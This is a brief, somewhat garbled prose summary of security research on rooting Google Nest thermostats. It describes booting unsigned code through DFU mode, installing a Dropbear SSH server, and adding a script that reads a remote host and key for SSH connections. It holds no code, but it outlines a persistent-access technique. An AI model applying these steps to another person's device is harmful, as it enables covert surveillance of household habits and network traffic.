Google’s Nest offers a variety of popular network enabled home utilities, it is popular of which is a thermostat that allows a user to control their household temperature remotely from their smart phone.This device seemingly useful, if not well protected can allow an attacker the ability to remotely monitor user’s habits or network traffic.
GTV Hacker go into a method of attacking Nest brand thermostats by leveraging the device’s DFU mode to boot unsigned code at the boot-loader level.
Hacker able to hijack the device’s code flow very early on, allowing us to make changes without any restrictions.
The Nest uses a CPU similar to the OMAP3630 series. This CPU features a Device Firmware Update (DFU) mode that can be accessed by holding down the Nest’s screen while off.
This mode is intended for the manufacturer to easily diagnose and repair the device. Unfortunately, in the case of the Nest, this mode also allows us to modify the device without restriction.
DFU mode is only intended as a catalyst to load the next stages of code, the first of which in our case is the x-loader binary. X-loader is a stage 1 boot-loader that is used on the Nest as the initial loading point for the system.
Hacker used custom modified version of U-Boot that is based on the GPL released Nest version to boot a Linux kernel.
Linux kernel is only used to access the Nest’s file system and add a cross compiled SSH server called Dropbear. This allows a user to connect to their Nest and obtain root access on their thermostat.
After installing the SSH server, we move on to adding a SH script which checks the Nest’s virtual disk every 10 minutes for 2 files, a “host.txt” which contains a username and host in the “username@ipaddress” format as well as a “key.txt” which contains the RSA key for the SSH connection.
